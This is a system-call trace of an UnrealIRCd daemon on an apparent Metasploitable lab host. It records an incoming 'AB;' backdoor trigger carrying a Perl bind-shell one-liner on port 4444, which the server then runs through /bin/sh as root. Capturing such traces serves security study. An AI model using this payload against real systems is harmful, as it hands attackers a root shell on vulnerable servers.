4519  20:01:19.716890 select(1024, [2 3 4 7 9], [], NULL, {0, 730000}) = 1 (in [7], left {0, 380000})
4519  20:01:20.066883 clock_gettime(CLOCK_MONOTONIC, {47289, 883913833}) = 0
4519  20:01:20.066932 recv(7, "PRIVMSG  #testit1 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59
4519  20:01:20.066977 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067007 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067023 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067038 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067051 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067065 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067079 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067093 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067106 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067120 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067133 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067147 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067160 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067174 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067187 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067201 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067214 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067228 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067241 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067255 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067269 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067295 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.067312 gettimeofday({1495670480, 67315}, NULL) = 0
4519  20:01:20.067324 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 420000})
4519  20:01:20.646169 clock_gettime(CLOCK_MONOTONIC, {47290, 463178199}) = 0
4519  20:01:20.646176 time(NULL)        = 1495670480
4519  20:01:20.646187 time(NULL)        = 1495670480
4519  20:01:20.646201 gettimeofday({1495670480, 646205}, NULL) = 0
4519  20:01:20.646214 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})
4519  20:01:20.646254 clock_gettime(CLOCK_MONOTONIC, {47290, 463266873}) = 0
4519  20:01:20.646264 gettimeofday({1495670480, 646268}, NULL) = 0
4519  20:01:20.646275 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})
4519  20:01:20.646314 clock_gettime(CLOCK_MONOTONIC, {47290, 463326802}) = 0
4519  20:01:20.646325 accept(2, 0, NULL) = 5
4519  20:01:20.646348 getpeername(5, {sa_family=AF_INET, sin_port=htons(36987), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0
4519  20:01:20.646379 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:01:20.646392 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:01:20.646405 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
4519  20:01:20.646418 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0
4519  20:01:20.646429 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0
4519  20:01:20.646440 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0
4519  20:01:20.646452 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0
4519  20:01:20.646469 clock_gettime(CLOCK_MONOTONIC, {47290, 463482087}) = 0
4519  20:01:20.646480 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
4519  20:01:20.646493 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:01:20.646610 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:01:20.646648 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0
4519  20:01:20.646659 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0
4519  20:01:20.646690 send(6, "\226\314\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39
4519  20:01:20.646754 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)
4519  20:01:20.646777 gettimeofday({1495670480, 646781}, NULL) = 0
4519  20:01:20.646788 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})
4519  20:01:20.649273 clock_gettime(CLOCK_MONOTONIC, {47290, 466282089}) = 0
4519  20:01:20.649280 recvfrom(6, "\226\314\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0X\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116
4519  20:01:20.649319 close(6)          = 0
4519  20:01:20.649334 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)
4519  20:01:20.649348 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174
4519  20:01:20.649404 time(NULL)        = 1495670480
4519  20:01:20.649416 time(NULL)        = 1495670480
4519  20:01:20.649428 gettimeofday({1495670480, 649431}, NULL) = 0
4519  20:01:20.649439 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:01:20.649478 clock_gettime(CLOCK_MONOTONIC, {47290, 466491938}) = 0
4519  20:01:20.649490 gettimeofday({1495670480, 649516}, NULL) = 0
4519  20:01:20.649539 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 910000})
4519  20:01:20.736127 clock_gettime(CLOCK_MONOTONIC, {47290, 553147604}) = 0
4519  20:01:20.736149 recv(7, "PRIVMSG  #testit1 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45
4519  20:01:20.736173 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736191 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736206 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736220 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736234 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736248 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736262 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736276 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736289 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736303 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736316 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736330 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736343 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736357 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736370 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736384 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736397 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736411 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736424 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736438 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736459 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736473 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 110000}, ...}) = 0
4519  20:01:20.736489 gettimeofday({1495670480, 736493}, NULL) = 0
4519  20:01:20.736501 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})
4519  20:01:20.736553 clock_gettime(CLOCK_MONOTONIC, {47290, 553566444}) = 0
4519  20:01:20.736565 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244
4519  20:01:20.736594 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0
4519  20:01:20.736614 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
4519  20:01:20.736626 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4519  20:01:20.736641 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 9928
9928  20:01:20.736719 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0
9928  20:01:20.736734 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0
9928  20:01:20.736745 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
9928  20:01:20.736758 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0
9928  20:01:20.736871 brk(0)            = 0x80f9000
9928  20:01:20.736894 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9928  20:01:20.736911 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f98000
9928  20:01:20.736927 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
9928  20:01:20.736945 open("/etc/ld.so.cache", O_RDONLY) = 1
9928  20:01:20.736958 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
9928  20:01:20.736977 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f90000
9928  20:01:20.736987 close(1)          = 0
9928  20:01:20.736998 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9928  20:01:20.737013 open("/lib/libncurses.so.5", O_RDONLY) = 1
9928  20:01:20.737027 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512
9928  20:01:20.737132 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0
9928  20:01:20.737150 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f60000
9928  20:01:20.737162 mmap2(0xb7f8d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f8d000
9928  20:01:20.737180 close(1)          = 0
9928  20:01:20.737192 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9928  20:01:20.737206 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
9928  20:01:20.737225 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
9928  20:01:20.737316 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
9928  20:01:20.737333 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5c000
9928  20:01:20.737344 mmap2(0xb7f5e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f5e000
9928  20:01:20.737360 close(1)          = 0
9928  20:01:20.737372 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9928  20:01:20.737385 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
9928  20:01:20.737399 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
9928  20:01:20.737488 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
9928  20:01:20.737505 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f5b000
9928  20:01:20.737519 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e0c000
9928  20:01:20.737530 mmap2(0xb7f55000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f55000
9928  20:01:20.737554 mmap2(0xb7f58000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f58000
9928  20:01:20.737568 close(1)          = 0
9928  20:01:20.737591 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e0b000
9928  20:01:20.737603 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e0b6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
9928  20:01:20.737667 mprotect(0xb7f55000, 4096, PROT_READ) = 0
9928  20:01:20.737705 munmap(0xb7f90000, 29913) = 0
9928  20:01:20.737732 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
9928  20:01:20.737746 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)
9928  20:01:20.737766 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbff98950) = -1 ENOTTY (Inappropriate ioctl for device)
9928  20:01:20.737800 brk(0)            = 0x80f9000
9928  20:01:20.737810 brk(0x80fa000)    = 0x80fa000
9928  20:01:20.737822 brk(0x80fb000)    = 0x80fb000
9928  20:01:20.737838 getuid32()        = 0
9928  20:01:20.737848 getgid32()        = 0
9928  20:01:20.737857 geteuid32()       = 0
9928  20:01:20.737866 getegid32()       = 0
9928  20:01:20.737880 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
9928  20:01:20.737894 time(NULL)        = 1495670480
9928  20:01:20.737907 brk(0x80fc000)    = 0x80fc000
9928  20:01:20.737922 brk(0x80fd000)    = 0x80fd000
9928  20:01:20.737942 open("/proc/meminfo", O_RDONLY) = 1
9928  20:01:20.737963 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
9928  20:01:20.737981 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f97000
9928  20:01:20.737993 read(1, "MemTotal:      1035240 kB\nMemFree:        204428 kB\nBuffers:        139408 kB\nCached:         449136 kB\nSwapCached:          0 kB\nActive:         465544 kB\nInactive:       311708 kB\nHighTotal:      131008 kB\nHighFree:          248 kB\nLowTotal:       904232 kB\nLowFree:        204180 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            1556 kB\nWriteback:           0 kB\nAnonPages:      188748 kB\nMapped:          52032 kB\nSlab:            31564 kB\nSReclaimable:    19312 kB\nSUnreclaim:      12252 kB\nPageTables:       2888 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   707672 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846
9928  20:01:20.738093 close(1)          = 0
9928  20:01:20.738104 munmap(0xb7f97000, 4096) = 0
9928  20:01:20.738117 brk(0x80fe000)    = 0x80fe000
9928  20:01:20.738143 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
9928  20:01:20.738157 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
9928  20:01:20.738169 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
9928  20:01:20.738181 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
9928  20:01:20.738193 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
9928  20:01:20.738205 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
9928  20:01:20.738218 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
9928  20:01:20.738230 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
9928  20:01:20.738244 uname({sys="Linux", node="metasploitable", ...}) = 0
9928  20:01:20.738292 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
9928  20:01:20.738310 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
9928  20:01:20.738329 brk(0x8100000)    = 0x8100000
9928  20:01:20.738341 getcwd("/etc/unreal", 4096) = 12
9928  20:01:20.738355 getpid()          = 9928
9928  20:01:20.738371 getppid()         = 4519
9928  20:01:20.738388 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
9928  20:01:20.738407 stat64("/sbin/sh", 0xbff98928) = -1 ENOENT (No such file or directory)
9928  20:01:20.738420 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
9928  20:01:20.738437 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
9928  20:01:20.738461 socket(PF_FILE, SOCK_STREAM, 0) = 1
9928  20:01:20.738476 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
9928  20:01:20.738488 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
9928  20:01:20.766217 close(1)          = 0
9928  20:01:20.766217 socket(PF_FILE, SOCK_STREAM, 0) = 1
9928  20:01:20.766217 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
9928  20:01:20.766218 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
9928  20:01:20.766229 close(1)          = 0
9928  20:01:20.766250 open("/etc/nsswitch.conf", O_RDONLY) = 1
9928  20:01:20.766267 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
9928  20:01:20.766285 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f97000
9928  20:01:20.766306 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475
9928  20:01:20.766358 read(1, "", 4096) = 0
9928  20:01:20.766368 close(1)          = 0
9928  20:01:20.766378 munmap(0xb7f97000, 4096) = 0
9928  20:01:20.766399 open("/etc/ld.so.cache", O_RDONLY) = 1
9928  20:01:20.766412 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
9928  20:01:20.766429 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f90000
9928  20:01:20.766439 close(1)          = 0
9928  20:01:20.766450 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9928  20:01:20.766466 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1
9928  20:01:20.766482 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 